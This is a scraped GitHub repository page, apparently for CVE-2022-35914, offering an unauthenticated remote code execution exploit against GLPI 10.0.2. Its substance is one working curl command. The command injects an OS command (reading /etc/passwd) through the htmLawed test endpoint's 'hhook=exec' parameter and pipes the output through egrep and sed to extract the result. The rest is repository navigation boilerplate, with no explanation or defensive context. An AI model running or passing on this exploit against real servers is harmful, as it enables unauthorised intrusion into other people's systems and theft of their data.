Unauthenticated RCE in GLPI 10.0.2
curl -s -d 'sid=foo&hhook=exec&text=cat /etc/passwd' -b 'sid=foo' http://{{HOST}}/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\ \[[0-9]+\] =\>'| sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/'
Unauthenticated RCE in GLPI 10.0.2
License
0xGabe/CVE-2022-35914
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
About
Unauthenticated RCE in GLPI 10.0.2
Resources
License
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published